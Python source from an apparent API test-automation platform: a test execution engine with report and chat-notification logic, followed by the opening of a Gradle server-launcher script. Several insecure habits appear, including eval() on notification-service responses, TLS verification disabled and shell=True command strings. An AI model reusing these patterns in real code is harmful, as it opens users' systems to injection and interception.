if 'headers' in test_case and test_case['headers'] not in ["", None, {}, {'': ''}]:
if isinstance(test_case['headers'], list):
for header in test_case['headers']:
if not header['name'].strip() == '':
request_headers[header['name']] = common.replace_global_var_for_str(
init_var_str=header['value'],
global_var_dic=self.global_vars) \
if isinstance(header['value'], str) else header['value']
else:
raise TypeError('headers must be list!')
request_headers = None if request_headers == {} else request_headers
returned_data['headers'] = request_headers
        # validate the requestBody format: it must be a list of dicts
if 'requestBody' in test_case and not isinstance(test_case['requestBody'], list):
raise TypeError("requestBody must be a list")
if 'requestBody' in test_case and isinstance(test_case['requestBody'], list):
for list_item in test_case['requestBody']:
if not isinstance(list_item, dict):
raise TypeError("requestBody must be a dict list")
if 'requestBody' in test_case and len(test_case['requestBody']) > 0:
if test_case['requestMethod'].lower() == 'get':
request_url += '?'
for key, value in test_case['requestBody'][0].items():
if value is not None:
request_url += '%s=%s&' % (key, value)
request_url = fake.resolve_faker_var(init_faker_var=request_url)
request_url = common.replace_global_var_for_str(init_var_str=request_url,
global_var_dic=self.global_vars)
request_url = common.resolve_int_var(init_int_str=request_url)
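                # drop the trailing '&' left by the loop (or the '?' when no key had a value)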
request_url = request_url[0:(len(request_url) - 1)]
returned_data['testCaseDetail']['url'] = request_url
else:
                # convert the list to a string first so global variables can be substituted
test_case['requestBody'] = str(test_case['requestBody'])
                # substitute faker variables
request_body_str = fake.resolve_faker_var(init_faker_var=test_case['requestBody'])
                # substitute global variables
request_body_str = common.replace_global_var_for_str(init_var_str=request_body_str,
global_var_dic=self.global_vars)
                # substitute Number-typed values in the requestBody (the surrounding quotes are removed)
request_body_str = common.replace_global_var_for_str(init_var_str=request_body_str,
global_var_dic=self.global_vars,
global_var_regex=r'\'\$num{.*?}\'',
match2key_sub_string_start_index=6,
match2key_sub_string_end_index=-2
)
                # substitute int variables whose quotes need to be removed
request_body_str = common.resolve_int_var(init_int_str=request_body_str)
if 'isJsonArray' not in test_case or not test_case['isJsonArray']:
request_body_str = request_body_str[1:-1]
                # convert back to a dict or list
request_body = ast.literal_eval(request_body_str)
returned_data['testCaseDetail']['requestBody'] = request_body
        # handle global variables
if 'setGlobalVars' in test_case and test_case['setGlobalVars'] not in [[], {}, "", None]:
set_global_vars = test_case['setGlobalVars']
# add by Vincent-Lee for data initial # 2020-1-7 16:40:56
        # handle data initialization (dataInitializes)
if 'dataInitializes' in test_case and test_case['dataInitializes'] not in ["", None, {}, {'': ''}]:
            if isinstance(test_case['dataInitializes'], list):
returned_data["dataInitResult"] = []
for dataInitialize in test_case['dataInitializes']:
if not dataInitialize['dbConfigId'].strip() == '':
returned_data["dataInitResult"].append(
execute_data_init(self.test_env_id, dataInitialize, self.global_vars))
        # handle cookies for test-suite execution
test_case['cookies'] = []
for key, value in session.cookies.items():
cookie_dic = dict()
cookie_dic['name'] = key
cookie_dic['value'] = value
test_case['cookies'].append(cookie_dic)
returned_data['testCaseDetail']['cookies'] = test_case['cookies']
        # for a debug run, load the temporary cookies saved for the case being debugged
if is_debug and not test_case.get('isClearCookie'):
request_cookies = get_cookies_by_suite(test_case.get("testSuiteId"))
returned_data['testCaseDetail']['cookies'] = request_cookies
if request_cookies:
cookie_jar = RequestsCookieJar()
for cookie in request_cookies:
cookie_jar.set(cookie['name'], cookie['value'])
session.cookies.update(cookie_jar)
try:
if 'delaySeconds' in test_case and test_case['delaySeconds'] > 0:
time.sleep(test_case['delaySeconds'])
returned_data['testCaseDetail']['delaySeconds'] = test_case['delaySeconds']
else:
returned_data['testCaseDetail']['delaySeconds'] = 0
if 'parameterType' in test_case and test_case["parameterType"] == "form":
response = session.request(url=request_url, method=request_method, data=request_body,
headers=request_headers, verify=False)
else:
response = session.request(url=request_url, method=request_method, json=request_body,
headers=request_headers, verify=False)
returned_data['elapsedSeconds'] = round(response.elapsed.total_seconds(), 3)
if is_debug:
                # save the temporary cookies for the case being debugged
response_cookies = []
for key, value in session.cookies.items():
cookie_dic = dict()
cookie_dic['name'] = key
cookie_dic['value'] = value
response_cookies.append(cookie_dic)
if len(response_cookies) > 0:
save_cookies_for_suite(test_case.get("testSuiteId"), response_cookies)
except BaseException as e:
returned_data["status"] = 'failed'
returned_data["testConclusion"].append(
{'resultType': test_conclusion.get(1), 'reason': '请求失败, 错误信息: <%s> ' % e})
return returned_data
response_status_code = response.status_code
returned_data["responseStatusCode"] = response_status_code
returned_data["responseData"] = response.text
        # checkResponseCode validation
if 'checkResponseCode' in test_case and test_case['checkResponseCode'] not in ["", None]:
check_response_code = test_case['checkResponseCode']
returned_data['checkResponseCode'] = check_response_code
        # checkSpendSeconds validation
if 'checkSpendSeconds' in test_case and test_case['checkSpendSeconds'] > 0:
check_spend_seconds = test_case['checkSpendSeconds']
returned_data['checkSpendSeconds'] = check_spend_seconds
try:
response_json = json.loads(response.text) if isinstance(response.text,
str) and response.text.strip() else {}
except BaseException as e:
            # an exception here means the interface did not return JSON
if set_global_vars and isinstance(set_global_vars, list):
for set_global_var in set_global_vars:
if isinstance(set_global_var, dict) and isinstance(set_global_var.get('name'),
str) and set_global_var.get('name'):
name = set_global_var.get('name')
query = set_global_var.get('query')
if query and isinstance(query, list):
query = common.replace_global_var_for_list(init_var_list=query,
global_var_dic=self.global_vars)
value = common.dict_get(response.text, query)
self.global_vars[name] = str(value) if value else value
if is_debug:
new_temp_suite_params[name] = str(value) if value else value
            # save the temporary suite variables
if is_debug and new_temp_suite_params:
temp_suite_params.update(new_temp_suite_params)
save_temp_params_for_suite(test_case.get("testSuiteId"), temp_suite_params)
if check_response_code and not str(response_status_code) == str(check_response_code):
returned_data["status"] = 'failed'
returned_data["testConclusion"].append(
{'resultType': test_conclusion.get(1),
'reason': '响应状态码错误, 期待值: <%s>, 实际值: <%s>。\t' % (check_response_code, response_status_code)})
return returned_data
if check_spend_seconds and check_spend_seconds < returned_data['elapsedSeconds']:
returned_data["status"] = 'failed'
returned_data["testConclusion"].append(
{'resultType': test_conclusion.get(1),
'reason': '请求超时, 期待耗时: %s s, 实际耗时: %s s。\t' % (
check_spend_seconds, returned_data['elapsedSeconds'])})
return returned_data
# check response number
need_check_res_num = isinstance(test_case.get('checkResponseNumber'), list) and len(
list(filter(lambda x: str(x.get('expressions').get('expectResult')).strip() == '',
test_case.get('checkResponseNumber')))) < 1
returned_data['status'] = 'failed' if need_check_res_num else 'ok'
returned_data["testConclusion"].append(
{'resultType': test_conclusion.get(1),
'reason': '接口返回格式不是json,无法进行数值校验, 错误信息: %s, 接口返回为: %s ' % (e, response.text)}) \
if returned_data.get('status') and returned_data.get('status') == 'failed' else None
            # checkResponseBody validation
if 'checkResponseBody' in test_case and test_case['checkResponseBody'] not in [[], {}, "", None]:
if not isinstance(test_case['checkResponseBody'], list):
raise TypeError('checkResponseBody must be list!')
need_check_response_body = False
for index, check_item in enumerate(test_case['checkResponseBody']):
if not isinstance(check_item, dict) or 'regex' not in check_item or 'query' not in check_item or \
not isinstance(check_item['regex'], str) or not isinstance(check_item['query'], list):
raise TypeError('checkResponseBody is not valid!')
                    # apply global-variable substitution to the expected values
if len(check_item['regex']) > 0:
need_check_response_body = True
test_case['checkResponseBody'][index]['regex'] = common.replace_global_var_for_str(
init_var_str=check_item['regex'], global_var_dic=self.global_vars) if check_item.get(
                        'regex') and isinstance(check_item.get('regex'), str) else ''  # note: Python treats an empty string as falsy
if check_item.get('query') and isinstance(check_item.get('query'), list):
test_case['checkResponseBody'][index]['query'] = common.replace_global_var_for_list(
init_var_list=check_item['query'], global_var_dic=self.global_vars)
if need_check_response_body:
check_response_body = test_case['checkResponseBody']
returned_data['checkResponseBody'] = check_response_body
if check_response_body:
for check_item in check_response_body:
regex = check_item['regex']
query = check_item['query']
real_value = common.dict_get(response.text, query)
if real_value is None:
returned_data["status"] = 'failed'
returned_data["testConclusion"].append(
{'resultType': test_conclusion.get(1),
'reason': '未找到匹配的正则校验的值(查询语句为: %s), 服务器响应为: %s' % (query, response.text)})
return returned_data
                    result = re.search(regex, str(real_value))  # the regex string is treated as a raw string (r'')
if not result:
returned_data["status"] = 'failed'
returned_data["testConclusion"].append(
{'resultType': test_conclusion.get(1),
'reason': '判断响应值错误(查询语句为: %s),响应值应满足正则: <%s>, 实际值: <%s> (%s)。(正则匹配时会将数据转化成string)\t'
% (query, regex, real_value, type(real_value))})
if returned_data['status'] == 'ok':
returned_data["testConclusion"].append({'resultType': test_conclusion.get(0), 'reason': '测试通过'})
return returned_data
if set_global_vars and isinstance(set_global_vars, list):
for set_global_var in set_global_vars:
if isinstance(set_global_var, dict) and isinstance(set_global_var.get('name'),
str) and set_global_var.get('name'):
name = set_global_var.get('name')
query = set_global_var.get('query')
value = common.dict_get(response_json, query)
self.global_vars[name] = str(value) if value else value
if is_debug:
new_temp_suite_params[name] = str(value) if value else value
        # save the temporary suite variables
if is_debug and new_temp_suite_params:
temp_suite_params.update(new_temp_suite_params)
save_temp_params_for_suite(test_case.get("testSuiteId"), temp_suite_params)
        # checkResponseBody validation
if 'checkResponseBody' in test_case and test_case['checkResponseBody'] not in [[], {}, "", None]:
if not isinstance(test_case['checkResponseBody'], list):
raise TypeError('checkResponseBody must be list!')
need_check_response_body = False
for index, check_item in enumerate(test_case['checkResponseBody']):
if not isinstance(check_item, dict) or 'regex' not in check_item or 'query' not in check_item or \
not isinstance(check_item['regex'], str) or not isinstance(check_item['query'], list):
raise TypeError('checkResponseBody is not valid!')
                # apply global-variable substitution to the expected values
if len(check_item['regex']) > 0:
need_check_response_body = True
test_case['checkResponseBody'][index]['regex'] = common.replace_global_var_for_str(
init_var_str=check_item['regex'], global_var_dic=self.global_vars) if check_item.get(
                    'regex') and isinstance(check_item.get('regex'), str) else ''  # note: Python treats an empty string as falsy
if check_item.get('query') and isinstance(check_item.get('query'), list):
test_case['checkResponseBody'][index]['query'] = common.replace_global_var_for_list(
init_var_list=check_item['query'], global_var_dic=self.global_vars)
if need_check_response_body:
check_response_body = test_case['checkResponseBody']
returned_data['checkResponseBody'] = check_response_body
# checkResponseNumber validation
if 'checkResponseNumber' in test_case and not test_case['checkResponseNumber'] in [[], {}, "", None]:
if not isinstance(test_case['checkResponseNumber'], list):
raise TypeError('checkResponseNumber must be list!')
for index, check_item in enumerate(test_case['checkResponseNumber']):
if not isinstance(check_item, dict) or 'expressions' not in check_item or not isinstance(
check_item['expressions'], dict):
raise TypeError('checkResponseNumber is not valid!')
test_case['checkResponseNumber'][index]['expressions']['firstArg'] = common.replace_global_var_for_str(
init_var_str=check_item['expressions']['firstArg'],
global_var_dic=self.global_vars) if check_item['expressions'].get('firstArg') and isinstance(
check_item['expressions'].get('firstArg'), str) else ''
test_case['checkResponseNumber'][index]['expressions']['secondArg'] = common.replace_global_var_for_str(
init_var_str=check_item['expressions']['secondArg'],
global_var_dic=self.global_vars) if check_item['expressions'].get('secondArg') and isinstance(
check_item['expressions'].get('secondArg'), str) else ''
test_case['checkResponseNumber'][index]['expressions'][
'expectResult'] = common.replace_global_var_for_str(
init_var_str=check_item['expressions']['expectResult'],
global_var_dic=self.global_vars) if check_item['expressions'].get('expectResult') and isinstance(
check_item['expressions'].get('expectResult'), str) else ''
check_response_number = test_case['checkResponseNumber']
returned_data['checkResponseNumber'] = []
if check_response_code and not str(response_status_code) == str(check_response_code):
returned_data["status"] = 'failed'
returned_data["testConclusion"].append(
{'resultType': test_conclusion.get(1),
'reason': '响应状态码错误, 期待值: <%s>, 实际值: <%s>。\t' % (check_response_code, response_status_code)})
if check_spend_seconds and check_spend_seconds < returned_data['elapsedSeconds']:
returned_data["status"] = 'failed'
returned_data["testConclusion"].append(
{'resultType': test_conclusion.get(1),
'reason': '请求超时, 期待耗时: %s s, 实际耗时: %s s。\t' % (
check_spend_seconds, returned_data['elapsedSeconds'])})
return returned_data
if check_response_body:
try:
for check_item in check_response_body:
regex = check_item['regex']
if regex.strip() == '':
continue
query = check_item['query']
real_value = common.dict_get(response_json, query)
if real_value is None:
returned_data["status"] = 'failed'
returned_data["testConclusion"].append(
{'resultType': test_conclusion.get(1),
'reason': '未找到正则校验的Json值(查询语句为: %s), 服务器响应为: %s' % (query, response_json)})
return returned_data
result = re.search(regex, str(real_value))  # the regex string is treated as a raw string (r'')
if not result:
returned_data["status"] = 'failed'
returned_data["testConclusion"].append(
{'resultType': test_conclusion.get(1),
'reason': '判断响应值错误(查询语句为: %s),响应值应满足正则: <%s>, 实际值: <%s> (%s)。(正则匹配时会将数据转化成string)\t'
% (query, regex, real_value, type(real_value))})
except BaseException as e:
returned_data["status"] = 'failed'
returned_data["testConclusion"].append({'resultType': test_conclusion.get(1),
'reason': '判断响应值时报错, 错误信息: <%s>。\t' % e})
if check_response_number:
try:
for check_item in check_response_number:
expressions = check_item['expressions']
if '' in expressions.values() or None in expressions.values():
continue
expressions_str, result = common.get_numbers_compared_result(expressions)
returned_data['checkResponseNumber'].append({'expression': expressions_str})
if not result:
returned_data["status"] = 'failed'
returned_data["testConclusion"].append(
{'resultType': test_conclusion.get(1),
'reason': '判断数值错误(判断表达式为: %s)。\t' % expressions_str})
except BaseException as e:
returned_data["status"] = 'failed'
returned_data["testConclusion"].append({'resultType': test_conclusion.get(1),
'reason': '判断数值时报错, 错误信息: <%s>。\t ' % e})
if not returned_data["testConclusion"]:
returned_data["status"] = 'ok'
returned_data["testConclusion"].append({'resultType': test_conclusion.get(0),
'reason': '测试通过'})
return returned_data
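# For reference, a hedged sketch of the structures validated above; the field values are made-up
# examples inferred only from the keys this method reads, not from project documentation:
#
#     test_case['checkResponseBody'] = [
#         # dict_get() walks the query path in the JSON response, then re.search() applies the regex
#         {'regex': '^ok$', 'query': ['data', 'status']},
#     ]
#     test_case['checkResponseNumber'] = [
#         # firstArg/secondArg/expectResult are substituted with global vars, then compared via
#         # common.get_numbers_compared_result()
#         {'expressions': {'firstArg': '100', 'secondArg': '0', 'expectResult': 'true'}},
#     ]
#     set_global_vars = [
#         # the value found at the query path is stored into self.global_vars['token']
#         {'name': 'token', 'query': ['data', 'token']},
#     ]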
def execute_manual_test_by_case(self, test_case_list):
test_results = []
for test_case in test_case_list:
test_start_time = time.time()
test_start_datetime = datetime.utcnow()
test_result = self.execute_single_case_test(test_case, is_debug=True)
test_end_time = time.time()
test_result["testStartTime"] = test_start_datetime
test_result["spendTimeInSec"] = round(test_end_time - test_start_time, 3)
test_results.append(test_result)
return test_results
def execute_single_suite_test(self, report_id, test_suite_id, include_forbidden=False):
testing_case_list = get_case_list_by_suite(test_suite_id, include_forbidden=include_forbidden)
test_suite_result = {
'_id': ObjectId(test_suite_id),
'suiteName': get_suite_name(test_suite_id),
'testStartTime': datetime.utcnow(),
'totalCount': len(testing_case_list)
}
pass_count = 0
fail_count = 0
error_count = 0
suite_start_time = time.time()
for test_case in testing_case_list:
test_start_datetime = datetime.utcnow()
test_start_time = time.time()
test_result = self.execute_single_case_test(test_case)
test_end_time = time.time()
test_result["name"] = test_case['name']
test_result["testStartTime"] = test_start_datetime
test_result["spendTimeInSec"] = round(test_end_time - test_start_time, 3)
save_report_detail(report_id, test_suite_id, test_case['_id'], test_result)
result_type = test_result['testConclusion'][0]['resultType']
if result_type == test_conclusion.get(0):
pass_count += 1
elif result_type == test_conclusion.get(1):
fail_count += 1
elif result_type == test_conclusion.get(2):
error_count += 1
suite_end_time = time.time()
test_suite_result['spendTimeInSec'] = round(suite_end_time - suite_start_time, 3)
test_suite_result['passCount'] = pass_count
test_suite_result['failCount'] = fail_count
test_suite_result['errorCount'] = error_count
return test_suite_result
# execute asynchronously so that debugging gets timely feedback
@async_test
def execute_test_by_suite_async(report_id, test_report, test_env_id, test_suite_id_list, protocol, domain,
global_env_vars):
test_report['testStartTime'] = datetime.utcnow()
report_total_count = 0
report_pass_count = 0
report_fail_count = 0
report_error_count = 0
report_start_time = time.time()
test_report['testSuites'] = {}
for test_suite_id in test_suite_id_list:
execute_engine = ExecutionEngine(test_env_id=test_env_id, protocol=protocol, domain=domain,
global_env_vars=global_env_vars)
test_suite_result = execute_engine.execute_single_suite_test(report_id, test_suite_id)
test_report['testSuites'][test_suite_id] = test_suite_result
report_total_count += test_suite_result['totalCount']
report_pass_count += test_suite_result['passCount']
report_fail_count += test_suite_result['failCount']
report_error_count += test_suite_result['errorCount']
test_report['totalCount'] = report_total_count
test_report['passCount'] = report_pass_count
test_report['failCount'] = report_fail_count
test_report['errorCount'] = report_error_count
report_end_time = time.time()
test_report['spendTimeInSec'] = round(report_end_time - report_start_time, 3)
test_report['createAt'] = datetime.utcnow()
save_report(test_report)
# scheduled tasks need to be executed synchronously
def execute_test_by_suite(report_id, test_report, test_env_id, test_suite_id_list, protocol, domain, global_env_vars):
test_report['testStartTime'] = datetime.utcnow()
report_total_count = 0
report_pass_count = 0
report_fail_count = 0
report_error_count = 0
report_start_time = time.time()
test_report['testSuites'] = {}
for test_suite_id in test_suite_id_list:
execute_engine = ExecutionEngine(test_env_id=test_env_id, protocol=protocol, domain=domain,
global_env_vars=global_env_vars)
test_suite_result = execute_engine.execute_single_suite_test(report_id, test_suite_id)
test_report['testSuites'][test_suite_id] = test_suite_result
report_total_count += test_suite_result['totalCount']
report_pass_count += test_suite_result['passCount']
report_fail_count += test_suite_result['failCount']
report_error_count += test_suite_result['errorCount']
test_report['totalCount'] = report_total_count
test_report['passCount'] = report_pass_count
test_report['failCount'] = report_fail_count
test_report['errorCount'] = report_error_count
report_end_time = time.time()
test_report['spendTimeInSec'] = round(report_end_time - report_start_time, 3)
test_report['createAt'] = datetime.utcnow()
return test_report
@async_test
def execute_plan_async(plan_id, plan_report_id, test_plan_report, test_env_id, env_name, protocol, domain,
execution_mode="planManual"):
# validate plan id
res_plan = common.format_response_in_dic(Plan.find_one({'_id': ObjectId(plan_id)}))
execution_range = list(map(get_project_execution_range, res_plan.get("executionRange")))
is_parallel = res_plan.get('isParallel')
plan_name = res_plan.get('name')
always_send_mail = res_plan.get('alwaysSendMail')
alarm_mail_group_list = res_plan.get('alarmMailGroupList')
enable_wxwork_notify = res_plan.get('enableWXWorkNotify')
wxwork_api_key = res_plan.get('WXWorkAPIKey')
mentioned_mobile_list = res_plan.get('WXWorkMentionMobileList')
always_wxwork_notify = res_plan.get('alwaysWXWorkNotify')
enable_ding_talk_notify = res_plan.get('enableDingTalkNotify')
ding_talk_access_token = res_plan.get('DingTalkAccessToken')
ding_talk_at_mobiles = res_plan.get('DingTalkAtMobiles')
ding_talk_secret = res_plan.get('DingTalkSecret')
always_ding_talk_notify = res_plan.get('alwaysDingTalkNotify')
# test plan report
test_plan_report['testStartTime'] = datetime.utcnow()
plan_total_count = 0
plan_pass_count = 0
plan_fail_count = 0
plan_error_count = 0
plan_start_time = time.time()
try:
if is_parallel:
counts = []
pool = Pool(processes=len(execution_range))
for item in execution_range:
count_dict = pool.apply_async(execute_single_project,
(item, plan_report_id, test_env_id, env_name, protocol, domain,
execution_mode))
counts.append(count_dict)
pool.close()
pool.join()
for count in counts:
plan_total_count += int(count.get().get("total_count"))
plan_pass_count += int(count.get().get("pass_count"))
plan_fail_count += int(count.get().get("fail_count"))
plan_error_count += int(count.get().get("error_count"))
else:
for item in execution_range:
count_dict = execute_single_project(item, plan_report_id, test_env_id, env_name, protocol, domain,
execution_mode)
plan_total_count += count_dict.get("total_count")
plan_pass_count += count_dict.get("pass_count")
plan_fail_count += count_dict.get("fail_count")
plan_error_count += count_dict.get("error_count")
test_plan_report['totalCount'] = plan_total_count
test_plan_report['passCount'] = plan_pass_count
test_plan_report['failCount'] = plan_fail_count
test_plan_report['errorCount'] = plan_error_count
plan_end_time = time.time()
test_plan_report['spendTimeInSec'] = round(plan_end_time - plan_start_time, 3)
test_plan_report['createAt'] = datetime.utcnow()
save_plan_report(test_plan_report)
if test_plan_report['totalCount'] > 0:
notify_total_count = test_plan_report['totalCount']
notify_pass_count = test_plan_report['passCount']
notify_pass_rate = '{:.2%}'.format(notify_pass_count / notify_total_count)
# send email notification
alarm_mail_list = []
if alarm_mail_group_list:
if isinstance(alarm_mail_group_list, list) and len(alarm_mail_group_list) > 0:
alarm_mail_list = get_mails_by_group(alarm_mail_group_list)
else:
raise TypeError('alarm_mail_group_list must be list')
is_send_mail = ((always_send_mail and isinstance(alarm_mail_list, list) and len(alarm_mail_list) > 0)
or (test_plan_report['totalCount'] > test_plan_report['passCount']
and isinstance(alarm_mail_list, list) and len(alarm_mail_list) > 0))
if is_send_mail:
subject = 'Leo API Auto Test Notify'
content_plan_result = "<font color='green'>PASS</font>"
if test_plan_report['totalCount'] > test_plan_report['passCount']:
content_plan_result = "<font color='red'>FAIL</font>"
content = "<h2>Dears:</h2>" \
"<div style='font-size:20px'> API Test Plan executed successfully!<br/>" \
" Plan Name: <b>{}</b><br/>" \
" Environment: <b>{}</b><br/>" \
" Status: <b>{}</b><br/>" \
" TotalAPICount: <b>{}</b><br/>" \
" PassAPICount: <b>{}</b><br/>" \
" PassRate: <b>{}</b><br/>" \
" <a href=\"http://{}:{}/plan/{}/reportDetail/{}\">Please login platform " \
"for details!</a><br/>" \
" Report ID: {}<br/>" \
" Generated At: {} CST</div>" \
.format(plan_name, env_name, content_plan_result, notify_total_count, notify_pass_count,
notify_pass_rate, host_ip, host_port, plan_id, plan_report_id, plan_report_id,
test_plan_report['createAt'].replace(tzinfo=pytz.utc).astimezone(
pytz.timezone('Asia/Shanghai')).strftime('%Y-%m-%d %H:%M:%S'))
mail_result = send_cron_email(alarm_mail_list, subject, content)
if mail_result.get('status') == 'failed':
with app.app_context():
current_app.logger.error('邮件发送异常: {}'.format(mail_result.get('data')))
raise BaseException('邮件发送异常: {}'.format(mail_result.get('data')))
# send WeChat Work (WXWork) notification
if enable_wxwork_notify:
if always_wxwork_notify or test_plan_report['totalCount'] > test_plan_report['passCount']:
notify_title = 'Leo API Auto Test Notify'
content_plan_result = "<font color='green'>PASS</font>"
if test_plan_report['totalCount'] > test_plan_report['passCount']:
content_plan_result = "<font color='red'>FAIL</font>"
content_text = '''请注意'''
content_markdown = '''{}
> Dears:
API Test Plan executed successfully!
Plan Name: **{}**
Environment: **{}**
Status: **{}**
TotalAPICount: **{}**
PassAPICount: **{}**
PassRate: **{}**
[Please login platform for details!](http://{}:{}/plan/{}/reportDetail/{})
Report ID: {}
Generated At: {} CST
'''.format(notify_title, plan_name, env_name, content_plan_result, notify_total_count,
notify_pass_count,
notify_pass_rate,
host_ip, host_port, plan_id, plan_report_id, plan_report_id,
test_plan_report['createAt'].replace(tzinfo=pytz.utc).astimezone(
pytz.timezone('Asia/Shanghai')).strftime('%Y-%m-%d %H:%M:%S'))
if mentioned_mobile_list and len(mentioned_mobile_list) > 0:
notify_res_text = send_notify.send_wxwork_notify_text(content_text, mentioned_mobile_list,
wxwork_api_key)
if notify_res_text.status_code != 200 or eval(
str(notify_res_text.content, encoding="utf-8")).get('errcode') != 0:
with app.app_context():
current_app.logger.error('企业微信通知发送异常: ResponseCode:{}, ResponseBody:{}'.format(
notify_res_text.status_code, notify_res_text.content))
raise BaseException('企业微信通知发送异常: ResponseCode:{}, ResponseBody:{}'.format(
notify_res_text.status_code, notify_res_text.content))
notify_res_markdown = send_notify.send_wxwork_notify_markdown(content_markdown, wxwork_api_key)
if notify_res_markdown.status_code != 200 or eval(
str(notify_res_markdown.content, encoding="utf-8")).get('errcode') != 0:
with app.app_context():
current_app.logger.error('企业微信通知发送异常: ResponseCode:{}, ResponseBody:{}'.format(
notify_res_markdown.status_code, notify_res_markdown.content))
raise BaseException('企业微信通知发送异常: ResponseCode:{}, ResponseBody:{}'.format(
notify_res_markdown.status_code, notify_res_markdown.content))
# send DingTalk notification
if enable_ding_talk_notify:
if always_ding_talk_notify or test_plan_report['totalCount'] > test_plan_report['passCount']:
notify_title = 'LEO API Auto Test Notify'
content_plan_result = "<font color='#00FF00'>PASS</font>"
if test_plan_report['totalCount'] > test_plan_report['passCount']:
content_plan_result = "<font color='#FF0000'>FAIL</font>"
content = "# {}\n" \
"API Test Plan executed successfully!\n\n" \
" Plan Name: **{}** \n\n" \
" Environment: **{}** \n\n" \
" Status: **{}** \n\n" \
" TotalAPICount: **{}** \n\n" \
" PassAPICount: **{}** \n\n" \
" PassRate: **{}** \n\n" \
" [Please login platform for details!](http://{}:{}/plan/{}/reportDetail/{})\n\n" \
" Report ID: **{}** \n\n" \
" Generated At: **{}** CST\n\n".format(notify_title, plan_name, env_name,
content_plan_result, notify_total_count,
notify_pass_count,
notify_pass_rate,
host_ip, host_port, plan_id, plan_report_id,
plan_report_id,
test_plan_report['createAt'].replace(
tzinfo=pytz.utc).astimezone(
pytz.timezone('Asia/Shanghai')).strftime(
'%Y-%m-%d %H:%M:%S'))
notify_res = send_notify.send_ding_talk_notify_markdown(notify_title, content,
ding_talk_access_token,
at_mobiles=ding_talk_at_mobiles,
secret=ding_talk_secret)
if notify_res.status_code != 200 or eval(str(notify_res.content, encoding="utf-8")).get(
'errcode') != 0:
with app.app_context():
current_app.logger.error('钉钉通知发送异常: ResponseCode:{}, ResponseBody:{}'.format(
notify_res.status_code, notify_res.content))
raise BaseException('钉钉通知发送异常: ResponseCode:{}, ResponseBody:{}'.format(
notify_res.status_code, notify_res.content))
else:
raise TypeError('无任何测试结果!')
except BaseException as e:
with app.app_context():
current_app.logger.error("execute_plan_async exception - %s." % str(e))
return False, "出错了 - %s" % e
def execute_single_project(item, plan_report_id, test_env_id, env_name, protocol, domain, execution_mode):
# generate a time-based ObjectId to use as the reportId
project_report_id = str(ObjectId())
project_start_datetime = datetime.utcnow()
project_test_report = {
'_id': ObjectId(project_report_id),
'testEnvId': ObjectId(test_env_id),
'testEnvName': env_name,
'testStartTime': project_start_datetime,
'executionMode': execution_mode,
'projectId': ObjectId(item.get('projectId')),
'planReportId': ObjectId(plan_report_id),
'testSuites': {}
}
project_report_total_count = 0
project_report_pass_count = 0
project_report_fail_count = 0
project_report_error_count = 0
project_start_time = time.time()
for test_suite_id in item.get("testSuiteIdList"):
global_env_vars = get_global_env_vars(test_env_id)
execute_engine = ExecutionEngine(test_env_id=test_env_id, protocol=protocol, domain=domain,
global_env_vars=global_env_vars)
test_suite_result = execute_engine.execute_single_suite_test(project_report_id, test_suite_id)
project_test_report['testSuites'][test_suite_id] = test_suite_result
project_report_total_count += test_suite_result['totalCount']
project_report_pass_count += test_suite_result['passCount']
project_report_fail_count += test_suite_result['failCount']
project_report_error_count += test_suite_result['errorCount']
project_test_report['totalCount'] = project_report_total_count
project_test_report['passCount'] = project_report_pass_count
project_test_report['failCount'] = project_report_fail_count
project_test_report['errorCount'] = project_report_error_count
project_end_time = time.time()
project_test_report['spendTimeInSec'] = round(project_end_time - project_start_time, 3)
project_test_report['createAt'] = datetime.utcnow()
save_report(project_test_report)
return {
'total_count': project_report_total_count,
'pass_count': project_report_pass_count,
'fail_count': project_report_fail_count,
'error_count': project_report_error_count
}
def get_project_execution_range(range):
# get execution range by priority for project
if range.get("projectId") is None or range.get("priority") is None:
with app.app_context():
current_app.logger.error("ProjectId and Priority should not be empty.")
if range.get("priority") == "P1" or range.get("priority") == "P2":
query_dict = {'projectId': ObjectId(range.get("projectId")),
'priority': range.get("priority"),
'isDeleted': {"$ne": True},
'status': True}
else:
query_dict = {'projectId': ObjectId(range.get("projectId")), 'isDeleted': {"$ne": True}, 'status': True}
res = TestSuite.find(query_dict)
test_suite_id_list = list(map(lambda e: str(e.get('_id')), res))
return {"projectId": range.get("projectId"), "testSuiteIdList": test_suite_id_list}
if __name__ == '__main__':
pass
|
server_controller.py
|
import subprocess
import sys
import functools
import os
import os.path as path
from threading import Thread
from queue import Queue, Empty
module_dir = path.abspath(path.join(path.dirname(__file__)))
_root_dir = path.abspath(path.join(module_dir, '..'))
class StdOutReader:
def __init__(self, stream, verbose=False):
self._stream = stream
self._queue = Queue()
self._read = True
def _reader(s, queue, verbose):
while self._read:
line = s.readline()
s.flush()
if line:
if verbose:
print(line)
queue.put(line)
self._thread = Thread(target=_reader, args=(self._stream, self._queue, verbose))
self._thread.daemon = True
self._thread.start()
def readline(self):
try:
return str(self._queue.get(block=False, timeout=0.1))
except Empty:
return ''
def stop(self):
self._read = False
self._thread.join()
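# Note: readline() above is deliberately non-blocking -- it returns '' whenever the background
# reader thread has not queued a new line yet -- so callers (see Server.run below) poll it in a
# loop until the expected ready string appears.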
class Initializer:
def __init__(self, project):
cmd = self._cmd_for_task(project, 'assembleDist', 'installDist')
print("gradle cmd: {}".format(cmd))
project_module_dir = path.abspath(path.join(_root_dir, project))
self._init_script = path.join(project_module_dir,
'build/install/{}/bin/{}'.format(project, project))
if subprocess.call(cmd, shell=True) == 0 and path.exists(self._init_script):
print('assembleDist installDist success')
else:
print('assembleDist installDist failed')
sys.exit(1)
def _cmd_for_task(self, project, *tasks):
template = ':{}:{}'
t = ' '.join(template.format(project, task) for task in tasks)  # builds ':project:task' for each task
return "{}/gradlew -p {} {}".format(_root_dir, _root_dir, t)
@property
def init_script(self):
return self._init_script
class Server:
def __init__(self, script, ready_str, *args, **kwargs):
self._port = kwargs.get('port', '')
self._name = kwargs.get('name', 'unnamed')
self._verbose = kwargs.get('verbose', False)
if len(args) > 1:
argv = ' '
for each in [str(i).strip() for i in args if len(str(i)) > 0]:
argv += ' ' + each
elif len(args) == 1:
argv = str(args[0]).strip()
else:
argv = ''
self.cmd = ' '.join("{} {} {} {}".format(script, self.port, self.name, argv).split())
self.process = None
self.ready_str = ready_str
@property
def port(self):
return str(self._port)
@property
def name(self):
return str(self._name)
def run(self):
if self.process is None:
print("server {} run cmd: {}".format(self.name, self.cmd))
env = {**os.environ, 'JAVA_OPTS': '-DDEBUG=1'}
self.process = subprocess.Popen("exec " + self.cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True, env=env)
